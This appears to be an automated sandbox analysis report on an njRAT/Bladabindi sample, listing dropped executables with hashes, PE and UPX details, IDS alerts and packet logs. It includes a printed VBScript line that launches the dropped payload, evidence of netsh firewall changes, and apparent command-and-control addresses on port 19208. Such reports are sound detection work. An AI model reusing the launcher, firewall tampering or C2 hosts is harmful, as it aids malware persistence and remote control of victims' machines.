                                                                      • Filename: 1_#Ud611#Ub825#Uc0ac_Hot_Line_#Uc900#Uc218_#Ud611#Uc870_#Uc694#Uccad#Uc758#Uac74.exe, Detection: malicious, Browse
                                                                      • Filename: DHL_IMPORT_TAX__INVOICE_3129143010_KRJ202318092409s.exe, Detection: malicious, Browse
                                                                      • Filename: 0473350311911207E#U00b7pdf.exe, Detection: malicious, Browse
                                                                      • Filename: PO#2301-DBOU5200338-6452951_-_DR_0-TTQT.TT.01_nh#U1ea5t_2023.exe, Detection: malicious, Browse
                                                                      • Filename: 2301_20230101_REGIA_BUILDING_KFT__443512415141300_NYUGTA#U00b7pdf.exe, Detection: malicious, Browse
                                                                      • Filename: DIEN_CHUYEN_TIEN_SacomBank-TT_20230421-1191736-80192949.exe, Detection: malicious, Browse
                                                                      • Filename: DLAWT.scr.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......].................p... ........... ........@.. ...............................C....@.................................P...K................................................................................... ............... ..H............text....j... ...p.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):4.9674574626610895
                                                                      Encrypted:false
                                                                      SSDEEP:1536:6Mnt+J23KumyB/VWHsJwcabSMH2Bcj9uzhZvsWgk:6EtE23K8TWHsJra+MH2ajszhZvxgk
                                                                      MD5:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                      SHA1:79129AF7EFA46244DA0676607242F0A6B7E12E78
                                                                      SHA-256:6CEAEBD55B4A542EF64BE1D6971FCFE802E67E2027366C52FAACC8A8D325EC7A
                                                                      SHA-512:C599B72500A5C17CD5C4A81FCF220A95925AA0E5AD72AA92DD1A469FE6E3C23590C548A0BE7EC2C4DBD737511A0A79C1C46436867CF7F0C4DF21F8DCEA9686CF
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Joe Sandbox View:
                                                                      • Filename: l0HzgCOAMF.exe, Detection: malicious, Browse
                                                                      • Filename: clSwWjTkJf.exe, Detection: malicious, Browse
                                                                      • Filename: _____(NYCU_2307-19TW)#Ufffdpdf.exe, Detection: malicious, Browse
                                                                      • Filename: 1_#Ud611#Ub825#Uc0ac_Hot_Line_#Uc900#Uc218_#Ud611#Uc870_#Uc694#Uccad#Uc758#Uac74.exe, Detection: malicious, Browse
                                                                      • Filename: DHL_IMPORT_TAX__INVOICE_3129143010_KRJ202318092409s.exe, Detection: malicious, Browse
                                                                      • Filename: 0473350311911207E#U00b7pdf.exe, Detection: malicious, Browse
                                                                      • Filename: PO#2301-DBOU5200338-6452951_-_DR_0-TTQT.TT.01_nh#U1ea5t_2023.exe, Detection: malicious, Browse
                                                                      • Filename: 2301_20230101_REGIA_BUILDING_KFT__443512415141300_NYUGTA#U00b7pdf.exe, Detection: malicious, Browse
                                                                      • Filename: DIEN_CHUYEN_TIEN_SacomBank-TT_20230421-1191736-80192949.exe, Detection: malicious, Browse
                                                                      • Filename: DLAWT.scr.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......].................p... ........... ........@.. ...............................C....@.................................P...K................................................................................... ............... ..H............text....j... ...p.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\Temp\WindowsServices.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                      Category:dropped
                                                                      Size (bytes):162146
                                                                      Entropy (8bit):7.837696717909293
                                                                      Encrypted:false
                                                                      SSDEEP:3072:tf/J2ULiTehI8FrkZqFMzVg//AY30OKalUPRjejXrcyrD:32UL2i9FJkg//r0OKYUPR6fTD
                                                                      MD5:52B074E39E4F3BA00C230BA82EB62499
                                                                      SHA1:054A51BF0C25309A728A8BC14C77262168F134A1
                                                                      SHA-256:4C75F91C9974D712EF96B2F6BFE99EDC15F110DEA80065A59E161E639D08E74D
                                                                      SHA-512:FC2126F7FE2B8CC8EDF4DE3DD701D896C7F997DB67945647E907C08FE31A2EBD0EECC3A77746688AAC88BD7324C33E65C41A26F9973190A1437D5DC8D855AC4F
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 87%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+...E...E...E.T.....E...K...E...O...E...A...E...N...E...A...E...D.R.E...N...E.P.C...E.Rich..E.........................PE..L.....\.................@...........9.......@....@..........................P...............................................G..\....@..............................................................................................................UPX0....................................UPX1.....@.......<..................@....rsrc........@.......@..............@......................................................................................................................................................................................................................................................................................................................................................................................3.05.UPX!....
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):116
                                                                      Entropy (8bit):4.886763621462936
                                                                      Encrypted:false
                                                                      SSDEEP:3:VfX9GTfmQKn0eFH5Os8pE2J5xAI6tHJUkn:VtGTfmQolFHIsZ23fOakn
                                                                      MD5:DEFA40E11A0ED2D15E035F651EE78204
                                                                      SHA1:8574FBF6B47E85A37121F9C2B6F2F7796D079DE7
                                                                      SHA-256:488EF782BCC9EDCF49A0C34FAA9C6E40122FBA1577C7FD13B14F597F5AA74864
                                                                      SHA-512:CC264DBFF646AD2B1B264A6BEC283887C017A4FB1A1EE15913756ACAE10C3063D3D8192FEE7F03B8055774E3B2FB6B3DC791A9AB43AD88CD1F24373269C6AF14
                                                                      Malicious:true
                                                                      Preview:on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: ..
                                                                      Process:C:\Users\user\Desktop\iR2UtZj5vP.exe
                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):4.9674574626610895
                                                                      Encrypted:false
                                                                      SSDEEP:1536:6Mnt+J23KumyB/VWHsJwcabSMH2Bcj9uzhZvsWgk:6EtE23K8TWHsJra+MH2ajszhZvxgk
                                                                      MD5:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                      SHA1:79129AF7EFA46244DA0676607242F0A6B7E12E78
                                                                      SHA-256:6CEAEBD55B4A542EF64BE1D6971FCFE802E67E2027366C52FAACC8A8D325EC7A
                                                                      SHA-512:C599B72500A5C17CD5C4A81FCF220A95925AA0E5AD72AA92DD1A469FE6E3C23590C548A0BE7EC2C4DBD737511A0A79C1C46436867CF7F0C4DF21F8DCEA9686CF
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......].................p... ........... ........@.. ...............................C....@.................................P...K................................................................................... ............... ..H............text....j... ...p.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\iR2UtZj5vP.exe
                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):4.9674574626610895
                                                                      Encrypted:false
                                                                      SSDEEP:1536:6Mnt+J23KumyB/VWHsJwcabSMH2Bcj9uzhZvsWgk:6EtE23K8TWHsJra+MH2ajszhZvxgk
                                                                      MD5:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                                      SHA1:79129AF7EFA46244DA0676607242F0A6B7E12E78
                                                                      SHA-256:6CEAEBD55B4A542EF64BE1D6971FCFE802E67E2027366C52FAACC8A8D325EC7A
                                                                      SHA-512:C599B72500A5C17CD5C4A81FCF220A95925AA0E5AD72AA92DD1A469FE6E3C23590C548A0BE7EC2C4DBD737511A0A79C1C46436867CF7F0C4DF21F8DCEA9686CF
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......].................p... ........... ........@.. ...............................C....@.................................P...K................................................................................... ............... ..H............text....j... ...p.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\netsh.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):313
                                                                      Entropy (8bit):4.971939296804078
                                                                      Encrypted:false
                                                                      SSDEEP:6:/ojfKsUTGN8Ypox42k9L+DbGMKeQE+vigqAZs2E+AYeDPO+Yswyha:wjPIGNrkHk9iaeIM6ADDPOHyha
                                                                      MD5:689E2126A85BF55121488295EE068FA1
                                                                      SHA1:09BAAA253A49D80C18326DFBCA106551EBF22DD6
                                                                      SHA-256:D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25
                                                                      SHA-512:C3736A8FC7E6573FA1B26FE6A901C05EE85C55A4A276F8F569D9EADC9A58BEC507D1BB90DBF9EA62AE79A6783178C69304187D6B90441D82E46F5F56172B5C5C
                                                                      Malicious:false
                                                                      Preview:..IMPORTANT: Command executed successfully...However, "netsh firewall" is deprecated;..use "netsh advfirewall firewall" instead...For more information on using "netsh advfirewall firewall" commands..instead of "netsh firewall", see KB article 947709..at https://go.microsoft.com/fwlink/?linkid=121488 .....Ok.....
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                      Entropy (8bit):7.837696717909293
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.39%
                                                                      • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                      • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      File name:iR2UtZj5vP.exe
                                                                      File size:162'146 bytes
                                                                      MD5:52b074e39e4f3ba00c230ba82eb62499
                                                                      SHA1:054a51bf0c25309a728a8bc14c77262168f134a1
                                                                      SHA256:4c75f91c9974d712ef96b2f6bfe99edc15f110dea80065a59e161e639d08e74d
                                                                      SHA512:fc2126f7fe2b8cc8edf4de3dd701d896c7f997db67945647e907c08fe31a2ebd0eecc3a77746688aac88bd7324c33e65c41a26f9973190a1437d5dc8d855ac4f
                                                                      SSDEEP:3072:tf/J2ULiTehI8FrkZqFMzVg//AY30OKalUPRjejXrcyrD:32UL2i9FJkg//r0OKYUPR6fTD
                                                                      TLSH:56F31245973C0152D022A67EBD66CA4B3246FC7B8BDFC60B0B9DB00B1F565144BDA63B
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+...E...E...E.T.....E...K...E...O...E...A...E...N...E...A...E...D.R.E...N...E.P.C...E.Rich..E.........................PE..L..
                                                                      Icon Hash:90cececece8e8eb0
                                                                      Entrypoint:0x4439f0
                                                                      Entrypoint Section:UPX1
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                      DLL Characteristics:
                                                                      Time Stamp:0x5CEE8DCE [Wed May 29 13:49:02 2019 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:6bac3cfe8acb6c6c4a30aaa022de2388
                                                                      Instruction
                                                                      pushad
                                                                      mov esi, 00430000h
                                                                      lea edi, dword ptr [esi-0002F000h]
                                                                      push edi
                                                                      jmp 00007FB394D2909Dh
                                                                      nop
                                                                      mov al, byte ptr [esi]
                                                                      inc esi
                                                                      mov byte ptr [edi], al
                                                                      inc edi
                                                                      add ebx, ebx
                                                                      jne 00007FB394D29099h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jc 00007FB394D2907Fh
                                                                      mov eax, 00000001h
                                                                      add ebx, ebx
                                                                      jne 00007FB394D29099h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      adc eax, eax
                                                                      add ebx, ebx
                                                                      jnc 00007FB394D2909Dh
                                                                      jne 00007FB394D290BAh
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jc 00007FB394D290B1h
                                                                      dec eax
                                                                      add ebx, ebx
                                                                      jne 00007FB394D29099h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      adc eax, eax
                                                                      jmp 00007FB394D29066h
                                                                      add ebx, ebx
                                                                      jne 00007FB394D29099h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      adc ecx, ecx
                                                                      jmp 00007FB394D290E4h
                                                                      xor ecx, ecx
                                                                      sub eax, 03h
                                                                      jc 00007FB394D290A3h
                                                                      shl eax, 08h
                                                                      mov al, byte ptr [esi]
                                                                      inc esi
                                                                      xor eax, FFFFFFFFh
                                                                      je 00007FB394D29107h
                                                                      sar eax, 1
                                                                      mov ebp, eax
                                                                      jmp 00007FB394D2909Dh
                                                                      add ebx, ebx
                                                                      jne 00007FB394D29099h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jc 00007FB394D2905Eh
                                                                      inc ecx
                                                                      add ebx, ebx
                                                                      jne 00007FB394D29099h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jc 00007FB394D29050h
                                                                      add ebx, ebx
                                                                      jne 00007FB394D29099h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      adc ecx, ecx
                                                                      add ebx, ebx
                                                                      jnc 00007FB394D29081h
                                                                      jne 00007FB394D2909Bh
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jnc 00007FB394D29076h
                                                                      add ecx, 02h
                                                                      cmp ebp, FFFFFB00h
                                                                      adc ecx, 02h
                                                                      lea edx, dword ptr [edi+ebp]
                                                                      cmp ebp, FFFFFFFCh
                                                                      jbe 00007FB394D290A0h
                                                                      mov al, byte ptr [edx]
                                                                      Programming Language:
                                                                      • [C++] VS98 (6.0) SP6 build 8804
                                                                      • [C++] VS98 (6.0) build 8168
                                                                      • [EXP] VC++ 6.0 SP5 build 8804
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x447040x15c.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x440000x704.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      UPX00x10000x2f0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      UPX10x300000x140000x13c00f976291f5d33fb0881f54d329e9595b2False0.8956314280063291data7.574554271444251IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0x440000x10000xa00315d6f2407f2b3acb730679c2592fb2bFalse0.34609375data3.0586146234294898IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_CURSOR0x441ac0x134dataEnglishUnited States0.4577922077922078
                                                                      RT_DIALOG0x442e40x36dataEnglishUnited States0.7962962962962963
                                                                      RT_DIALOG0x443200x42dataEnglishUnited States0.8181818181818182
                                                                      RT_STRING0x443680x4adataEnglishUnited States0.6081081081081081
                                                                      RT_GROUP_CURSOR0x443b80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                      RT_VERSION0x443d00x334dataEnglishUnited States0.4426829268292683
                                                                      DLLImport
                                                                      KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                                                      GDI32.dllEscape
                                                                      MFC42.DLL
                                                                      MSVCRT.dllexit
                                                                      USER32.dllIsIconic
                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States
                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      192.168.2.113.6.122.10749705192082033132 02/05/24-17:11:46.647234TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4970519208192.168.2.113.6.122.107
                                                                      192.168.2.113.6.122.10749726192082033132 02/05/24-17:14:07.579174TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4972619208192.168.2.113.6.122.107
                                                                      192.168.2.113.6.122.10749715192082033132 02/05/24-17:12:25.474260TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4971519208192.168.2.113.6.122.107
                                                                      192.168.2.113.6.122.10749716192082033132 02/05/24-17:12:30.626186TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4971619208192.168.2.113.6.122.107
                                                                      192.168.2.113.6.98.23249725192082033132 02/05/24-17:13:59.558134TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4972519208192.168.2.113.6.98.232
                                                                      192.168.2.113.6.122.10749713192082033132 02/05/24-17:12:21.856556TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4971319208192.168.2.113.6.122.107
                                                                      192.168.2.113.6.122.10749717192082033132 02/05/24-17:12:34.128286TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4971719208192.168.2.113.6.122.107
                                                                      192.168.2.113.6.122.10749706192082033132 02/05/24-17:11:51.063759TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4970619208192.168.2.113.6.122.107
                                                                      192.168.2.113.6.122.10749727192082033132 02/05/24-17:15:07.884925TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4972719208192.168.2.113.6.122.107
                                                                      192.168.2.113.6.98.23249720192082033132 02/05/24-17:12:47.573414TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4972019208192.168.2.113.6.98.232
                                                                      192.168.2.113.6.98.23249721192082033132 02/05/24-17:12:50.977611TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4972119208192.168.2.113.6.98.232
                                                                      192.168.2.113.6.122.10749709192082033132 02/05/24-17:12:05.752627TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4970919208192.168.2.113.6.122.107
                                                                      192.168.2.113.6.98.23249723192082033132 02/05/24-17:13:00.449419TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4972319208192.168.2.113.6.98.232
                                                                      192.168.2.113.6.122.10749711192082033132 02/05/24-17:12:12.529858TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4971119208192.168.2.113.6.122.107
                                                                      192.168.2.113.6.122.10749712192082033132 02/05/24-17:12:17.572819TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4971219208192.168.2.113.6.122.107
                                                                      192.168.2.113.6.122.10749719192082033132 02/05/24-17:12:42.069121TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4971919208192.168.2.113.6.122.107
                                                                      192.168.2.113.6.98.23249722192082033132 02/05/24-17:12:55.034301TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4972219208192.168.2.113.6.98.232
                                                                      192.168.2.113.6.98.23249724192082033132 02/05/24-17:13:13.604278TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4972419208192.168.2.113.6.98.232
                                                                      192.168.2.113.6.122.10749707192082033132 02/05/24-17:11:55.885933TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4970719208192.168.2.113.6.122.107
                                                                      192.168.2.113.6.115.18249728192082033132 02/05/24-17:15:26.191172TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4972819208192.168.2.113.6.115.182
                                                                      192.168.2.113.6.122.10749718192082033132 02/05/24-17:12:37.780074TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4971819208192.168.2.113.6.122.107
                                                                      192.168.2.113.6.122.10749708192082033132 02/05/24-17:12:00.269481TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4970819208192.168.2.113.6.122.107
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Feb 5, 2024 17:11:44.461122990 CET4970519208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:11:44.772427082 CET19208497053.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:11:44.772525072 CET4970519208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:11:45.086916924 CET19208497053.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:11:45.086986065 CET4970519208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:11:46.647233963 CET4970519208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:11:46.959233999 CET19208497053.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:11:48.855747938 CET4970619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:11:49.169471025 CET19208497063.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:11:49.169600010 CET4970619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:11:49.480331898 CET19208497063.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:11:49.480896950 CET4970619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:11:51.063759089 CET4970619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:11:51.373941898 CET19208497063.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:11:54.165860891 CET4970719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:11:54.470952034 CET19208497073.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:11:54.471024036 CET4970719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:11:54.777709961 CET19208497073.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:11:54.777765989 CET4970719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:11:55.885932922 CET4970719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:11:56.190927029 CET19208497073.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:11:57.950170994 CET4970819208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:11:58.260083914 CET19208497083.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:11:58.260174990 CET4970819208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:11:58.575297117 CET19208497083.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:11:58.575376034 CET4970819208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:00.269480944 CET4970819208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:00.579313993 CET19208497083.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:02.458180904 CET4970919208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:02.774496078 CET19208497093.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:02.774601936 CET4970919208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:03.091116905 CET19208497093.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:03.091185093 CET4970919208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:05.752626896 CET4970919208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:06.068674088 CET19208497093.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:07.898121119 CET4971119208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:08.210830927 CET19208497113.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:08.210968971 CET4971119208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:08.523726940 CET19208497113.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:08.523829937 CET4971119208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:12.529858112 CET4971119208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:12.842376947 CET19208497113.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:14.995137930 CET4971219208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:15.300496101 CET19208497123.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:15.300612926 CET4971219208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:15.606224060 CET19208497123.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:15.606290102 CET4971219208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:17.572818995 CET4971219208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:17.878174067 CET19208497123.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:19.640156031 CET4971319208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:19.947216988 CET19208497133.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:19.947335958 CET4971319208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:20.254456997 CET19208497133.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:20.254507065 CET4971319208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:21.856555939 CET4971319208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:22.163645983 CET19208497133.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:23.966906071 CET4971519208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:24.281591892 CET19208497153.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:24.281711102 CET4971519208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:24.596368074 CET19208497153.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:24.596488953 CET4971519208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:25.474260092 CET4971519208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:25.788697958 CET19208497153.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:27.515460968 CET4971619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:27.830136061 CET19208497163.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:27.830236912 CET4971619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:28.145143032 CET19208497163.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:28.145215988 CET4971619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:30.626185894 CET4971619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:30.940824032 CET19208497163.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:32.704363108 CET4971719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:33.016388893 CET19208497173.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:33.016470909 CET4971719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:33.328491926 CET19208497173.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:33.328646898 CET4971719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:34.128285885 CET4971719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:34.440009117 CET19208497173.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:36.196820021 CET4971819208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:36.511382103 CET19208497183.6.122.107192.168.2.11
